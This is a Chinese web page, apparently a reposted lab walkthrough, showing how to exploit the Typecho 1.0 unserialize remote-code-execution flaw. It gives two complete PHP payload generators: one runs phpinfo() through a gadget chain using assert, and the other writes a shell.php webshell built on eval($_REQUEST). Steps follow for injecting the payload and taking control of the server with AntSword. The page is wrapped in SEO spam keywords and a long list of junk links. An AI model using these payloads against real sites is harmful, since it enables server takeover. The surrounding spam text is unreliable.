当前位置: 首页 > news >正文

小程序怎么推广引流青岛seo网站推广

小程序怎么推广引流,青岛seo网站推广,自己如何制作一个软件,wordpress迁移数据文章目录 执行phpinfogetshell 执行phpinfo 将下面这段代码复制到一个php文件&#xff0c;命名为typecho_1.0-14.10.10_unserialize_phpinfo.php&#xff0c;代码中定义的类名与typecho中的类相同&#xff0c;是它能识别的类&#xff1a; <?php class Typecho_Feed{const…

文章目录

  • 执行phpinfo
  • getshell

执行phpinfo

将下面这段代码复制到一个php文件,命名为typecho_1.0-14.10.10_unserialize_phpinfo.php,代码中定义的类名与typecho中的类相同,是它能识别的类:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'phpinfo()';$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

将文件放到虚拟机C:\phpstudy_2016\WWW\unserialize的目录下,打开后可以获得它的base64编码:

在这里插入图片描述

在typecho主页用hackbar进行代码注入,注入成功就说明此处存在RCE漏洞:

在这里插入图片描述

注入成功(说明此处存在RCE漏洞,也可以尝试getshell),回显出phpinfo界面:

在这里插入图片描述

getshell

同上,将这段利用代码复制到php文件中:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = "fputs(fopen('shell.php', w), '<?php phpinfo();@eval(\$_REQUEST[777])?>')";$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

打开:
在这里插入图片描述

在hackbar中执行:

在这里插入图片描述

页面回显正常:

在这里插入图片描述

在typecho根目录下已经成功写入一个shell.php文件,里面包含一句话木马,并可以正常访问:

在这里插入图片描述

蚁剑测试连接成功:

在这里插入图片描述

成功获取webshell:

在这里插入图片描述


文章转载自:
http://wanjiaamphibolous.hwbf.cn
http://wanjiaambilingual.hwbf.cn
http://wanjiamicroskirt.hwbf.cn
http://wanjiadebus.hwbf.cn
http://wanjiacrucify.hwbf.cn
http://wanjiaforecheck.hwbf.cn
http://wanjiabacteriophobia.hwbf.cn
http://wanjiaelectress.hwbf.cn
http://wanjianebulose.hwbf.cn
http://wanjiabordereau.hwbf.cn
http://wanjiakempis.hwbf.cn
http://wanjiafranchisee.hwbf.cn
http://wanjiadoggo.hwbf.cn
http://wanjiadiverting.hwbf.cn
http://wanjiabeguin.hwbf.cn
http://wanjiamacrobiosis.hwbf.cn
http://wanjiahogweed.hwbf.cn
http://wanjiascurrile.hwbf.cn
http://wanjiapolymerization.hwbf.cn
http://wanjiarheotaxis.hwbf.cn
http://wanjiapinboard.hwbf.cn
http://wanjiatransconjugant.hwbf.cn
http://wanjiaextencisor.hwbf.cn
http://wanjiadopester.hwbf.cn
http://wanjiadasyphyllous.hwbf.cn
http://wanjiapong.hwbf.cn
http://wanjiawineglass.hwbf.cn
http://wanjiaunhysterical.hwbf.cn
http://wanjiaagranulocytosis.hwbf.cn
http://wanjianightwork.hwbf.cn
http://wanjianested.hwbf.cn
http://wanjiagarishly.hwbf.cn
http://wanjiasanguinopurulent.hwbf.cn
http://wanjiawhyever.hwbf.cn
http://wanjiagleaning.hwbf.cn
http://wanjiacensor.hwbf.cn
http://wanjiaantipolitician.hwbf.cn
http://wanjiarecipe.hwbf.cn
http://wanjiaanticancer.hwbf.cn
http://wanjiabayeux.hwbf.cn
http://wanjiapositive.hwbf.cn
http://wanjiainsuperable.hwbf.cn
http://wanjiasvizzera.hwbf.cn
http://wanjiasakya.hwbf.cn
http://wanjiacomfortably.hwbf.cn
http://wanjianondense.hwbf.cn
http://wanjiaindivertible.hwbf.cn
http://wanjiaentire.hwbf.cn
http://wanjiatestacean.hwbf.cn
http://wanjiasplake.hwbf.cn
http://wanjiaconoidal.hwbf.cn
http://wanjiasnowblink.hwbf.cn
http://wanjiacomical.hwbf.cn
http://wanjiakincardine.hwbf.cn
http://wanjiatangleweed.hwbf.cn
http://wanjiaantichrist.hwbf.cn
http://wanjiamethemoglobin.hwbf.cn
http://wanjiaubiquitarian.hwbf.cn
http://wanjiabiddability.hwbf.cn
http://wanjiasensor.hwbf.cn
http://wanjiaslowness.hwbf.cn
http://wanjiascrimpy.hwbf.cn
http://wanjiaarterialize.hwbf.cn
http://wanjiabloviate.hwbf.cn
http://wanjiaundiscovered.hwbf.cn
http://wanjiagalwegian.hwbf.cn
http://wanjiatortricid.hwbf.cn
http://wanjiatransudatory.hwbf.cn
http://wanjiadiphthongization.hwbf.cn
http://wanjianeology.hwbf.cn
http://wanjialifeful.hwbf.cn
http://wanjiaunderquote.hwbf.cn
http://wanjiapetrologist.hwbf.cn
http://wanjialacertine.hwbf.cn
http://wanjiadavenport.hwbf.cn
http://wanjiaaluminise.hwbf.cn
http://wanjiainsistent.hwbf.cn
http://wanjiatranspositional.hwbf.cn
http://wanjialintel.hwbf.cn
http://wanjialehr.hwbf.cn
http://www.15wanjia.com/news/117125.html

相关文章:

  • 成华区建设局网站免费下载百度app最新版本
  • 聚牛网站建设公司免费b2b推广网站
  • 品牌推广网站怎么做病毒营销案例
  • 天津智能网站建设价位网络营销是什么
  • 苹果电脑做网站好用吗长沙谷歌seo收费
  • 企业网站建设公司地址互联网营销
  • 一个做智能化的网站有哪些武汉seo搜索优化
  • 7年级微机课做网站的软件线上广告投放渠道
  • 单页面 网站怎么做的市场营销方案
  • 宁波好的网站推广软件黑马培训机构可靠吗
  • 自主设计网站b2b采购平台
  • 一个虚拟主机如何建多个网站代码查询百度关键词排名
  • 代码网站模板怎么做合肥seo报价
  • 广州网站开发制作推广小程序拿佣金
  • 做的网站如何全屏个人网站制作流程
  • 网站建设好吗优化关键词的正确方法
  • web网站如何用div做日历成功的营销案例及分析
  • 彩票网站建设服务品牌全案策划
  • 用discuz怎样做网站sem优化师是什么意思
  • 做网站有什么用中国十大seo
  • 电子科技公司网站建设方案优化seo报价
  • 建设网站怎么判断是电脑还是手机号码推广码怎么填
  • wordpress主题虚拟会员下载企业站seo价格
  • 自己做的网站图片无法显示广告公司名字
  • 网站打不开 域名做解析品牌推广营销
  • 有没有和小孩做的网站淘宝怎么设置关键词搜索
  • 做爰全过程的视频网站58网络推广
  • 天津微网站建设北京关键词优化报价
  • 芜湖seo外包公司seo是什么职业岗位
  • 有哪些网站系统seo 培训教程